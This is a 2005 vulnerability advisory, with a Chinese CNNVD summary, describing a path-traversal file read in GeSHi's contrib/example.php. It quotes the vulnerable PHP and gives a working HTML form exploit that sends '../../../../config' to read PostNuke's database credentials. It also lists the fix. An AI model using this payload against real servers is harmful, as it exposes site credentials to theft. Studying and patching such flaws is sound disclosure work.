https://cxsecurity.com/issue/WLB-2005090048
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200509-271

GeSHi（GenericSyntaxHighlighter）是德国软件开发者MilianWolff所研发的一个在HTML页面中提供源代码高亮显示功能的库，它支持多种语言，如PHP、HTML、C和Java等，并能够集成到WordPress和WikkaWiki等系统中使用。GeSHi1.0.7.3之前版本中的contrib/example.php脚本存在安全漏洞，远程攻击者可通过没有源字段集的language字段读取任意文件。

[GeSHi Local PHP file inclusion 1.0.7.2]

Author: Maksymilian Arciemowicz ( cXIb8O3 ).17
Date: 21.9.2005

- --- 0.Description ---

GeSHi started as a mod for the phpBB forum system, to enable highlighting of more languages than the available (which
was 0 ;)). However, it quickly spawned into an entire project on its own. But now it has been released, work continues
on a mod for phpBB - and hopefully for many forum systems, blogs and other web-based systems.

Several systems are using GeSHi now, including:

PostNuke - A popular open source CMS
Docuwiki - An advanced wiki engine
gtk.php.net - Their manual uses GeSHi for syntax highlighting
WordPress - A powerful blogging system
PHP-Fusion - A constantly evovling CMS
SQL Manager - A Postgres DBAL
Mambo - A popular open source CMS
MediaWiki - A leader in Wikis
TikiWiki - A megapowerful Wiki/CMS, and one I personally use
RWeb - A site-building tool


- --- 1. Local (PHP) file inclusion ---
I have found one bug in file ./contrib/example.php
This file exists in standart packet GeSHi.
In file:

- -10-18-line---
include('../geshi.php');
if ( isset($_POST['submit']) )
{
if ( get_magic_quotes_gpc() ) $_POST['source'] = stripslashes($_POST['source']);
if ( !strlen(trim($_POST['source'])) )
{
$_POST['source'] = implode('', @file('../geshi/' . $_POST['language'] . '.php'));
$_POST['language'] = 'php';
}
- -10-18-line---

Ok.. so, if exists variable $_POST['submit'] and $_POST['language'], you can read any php file
(for example in postnuke -config.php-).
You need use varible $_POST['language'] wher is path to php file.
I have tested this bug in GeSHi package and in PostNuke 0.760.

PostNuke 0.760 (file: ./modules/pn_bbcode/pnincludes/contrib/example.php)

We can read config.php in PostNuke where we have login, password, dbname and dbhost.
All variables needed to log in to database.
So we can just use this exploit below :

- --- EXPLOIT TESTED IN POSTNUKE 0.760 ---
<center><a href="http://cxsecurity.com" target="http://cxsecurity.com/"><img
src="http://cxsecurity.com/gfx/small_logo.png"></a><p>
<form action="http://[HOST]/modules/pn_bbcode/pnincludes/contrib/example.php" method="post">
Path to file:<br>
example: <b>../../../../config</b><br>
<textarea name="language"></textarea><br>
<input type="submit" name="submit" value="See">
</form>
- --- EXPLOIT FOR POSTNUKE 0.760 ---

[HOST] = example. http://www.cxsecurity.com/postnuke/html
any questions? ;]

- --- 2. How to fix ---
Patch
http://cxsecurity.com/patch/2
works in PostNuke 0.760

or new version of script 1.0.7.3

- --- 3.Contact ---
Author: Maksymilian Arciemowicz < cXIb8O3 >

来源:BID
名称:14903
链接:http://www.securityfocus.com/bid/14903
来源:sourceforge.net
链接:http://sourceforge.net/project/shownotes.php?release_id=358285